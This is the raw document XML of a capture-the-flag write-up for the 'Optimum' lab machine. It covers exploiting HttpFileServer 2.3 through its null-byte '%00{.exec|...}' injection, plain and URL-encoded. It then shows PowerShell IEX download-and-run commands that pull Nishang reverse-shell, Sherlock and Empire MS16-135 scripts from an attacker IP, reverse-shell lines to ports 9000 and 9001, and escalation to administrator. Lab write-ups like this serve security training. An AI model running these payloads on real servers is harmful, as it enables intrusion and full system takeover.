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Optimum</w:t>
      </w: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Easy</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w:t>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an aggressive nmap scan, we see only port 80 is open on the server. Nmap has identified this as a HttpFileServer with version 2.3. Given this and no other useful information, the website running on this port is the best place to look for an initial foothold. </w:t>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7275" cy="373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7275" cy="373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Webpage</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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the website, we are presented with a login page containing a few other features such as a search bar and what appears to be an image inverter and master. At the bottom of the page we see the web page is running HttpFileServer 2.3. I attempted basic credentials but got nothing good back. After that I tried “searching” with burpsuite running and still got nothing useful. Finally, I looked at the server version and its possible exploits. </w:t>
      </w:r>
    </w:p>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62103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38725" cy="6210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for HttpFileServer 2.3 exploits and vulnerabilities, we see there is an exploit that provides Remote Code Execution (RCE). If we pass a null byte (%00), then the scripting language running inside the server will stop its regular expression matching, thus allowing us to escape and execute whatever commands we want so long as it is within the Rejetto language. Specifically, we are going to use the “.exec” functionality followed by a pipe and the code we wish to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">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%00{.exec| OUR CODE .}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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execute a reverse shell as our payload. To do this, we will utilize Nishang’s “Invoke-PowerShellTcp.ps1” script. The first step in setting this up is putting the following function command at the end of the script. Doing this will execute the function upon reaching the end of the file and send back a shell to us. The following picture shows what to place at the end of the file. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">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9431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102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Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.34 -Port 9000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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we set up a python http server running on local port 8000 and a netcat listener on local port 9000, the port where we will “catch” the reverse shell sent back to us. Once this is complete, we can finally send a request through the webapp to then grab the Nishang script and execute it with powershell. This is done with the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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URL encoded:</w:t>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%00{.exec|C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.34:8000/Invoke-PowerShellTcp.ps1').}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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command is being sent through a website, it must be UrlEncoded or else it will not work. This can be easily done inside burpsuite by highlighting the above command and pressing “shift + u”. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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encoded:</w:t>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%00{.exec|C%3a\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe+IEX(New-Object+Net.WebClient).downloadString('http%3a//10.10.14.34%3a8000/Invoke-PowerShellTcp.ps1').}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this request through the website, we are sent back a shell on our netcat port 9000 listener and achieve RCE as user Kostas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">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0125" cy="14097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810125" cy="1409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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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command we always execute upon entering a windows environment is the “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">systeminfo” </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command. This will provide us general information about the server, including its version, architecture, build date, hotfixes, and more. Performing this command shows the following server information. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">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42291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102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489585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47850" cy="4895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above figures show, the server is running Windows 2012 R2 with a few hotfixes. Although there are quite a number of hotfixes, we cannot rule out the possibility of a kernel exploit. To check for such vulnerabilities, we run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sherlock</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, a script that will automatically detect kernel based vulnerabilities and link their exploits to us. To execute Sherlock, type the following on Optimum to grab the sherlock script from our http python server and execute it. Make sure the Sherlock script is located where the python server is for convenience sake. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">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IEX(New-Object Net.WebClient).downloadString('http://10.10.14.34:8000/Sherlock.ps1');Find-AllVulns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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print a long list of vulnerabilities based on kernel exploitations and a lack of specific hotfixes. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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Sherlock has completed, we observe 3 exploit candidates for potential privilege escalation. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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8194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10250" cy="2819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we are interested in is the Win32k Elevation of Privilege - CVE 2016-7255 OR MS16-135.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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use Empire, a github with windows post exploitation scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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Empire has a script for MS16-135 and the others listed in Sherlock. To set up a script, we go into the MS16-135 one, or another respective script, and put its function at the bottom to execute a command utilizing the exploit identified in Sherlock. For the case of MS16-135, I put the following at the end of the Empire script:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">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Invoke-MS16135 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.34:8000/Invoke-PowerShellTcp.ps1')"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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changed the Invoke-PowerShellTcp.ps1 end line with a new port. Utilizing the same port as before would not work, thus a change must be made. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">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Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.34 -Port 9001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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this is complete, we set up a python server and a netcat listener on port 9001 and execute the proceeding powershell command to grab the MS16-135 script off our machine. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">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1303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102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IEX(New-Object Net.WebClient).downloadString('http://10.10.14.34:8000/Invoke-MS16135.ps1')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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requesting the Empire script form our machine, the server successfully executes and runs the reverse shell as the administrator user. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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Rooted</w:t>
      </w:r>
    </w:p>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9650" cy="1400175"/>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19650" cy="1400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Notes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">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E">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System32 = 32 bit binaries</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">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SysWow64 = 32 bit binaries</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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SysNative = 64 bit binaries</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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Path to powershell:</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84">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C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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Download and execute in PS:</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87">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IEX(New-Object Net.WebClient).downloadString('WHERE TO GO')</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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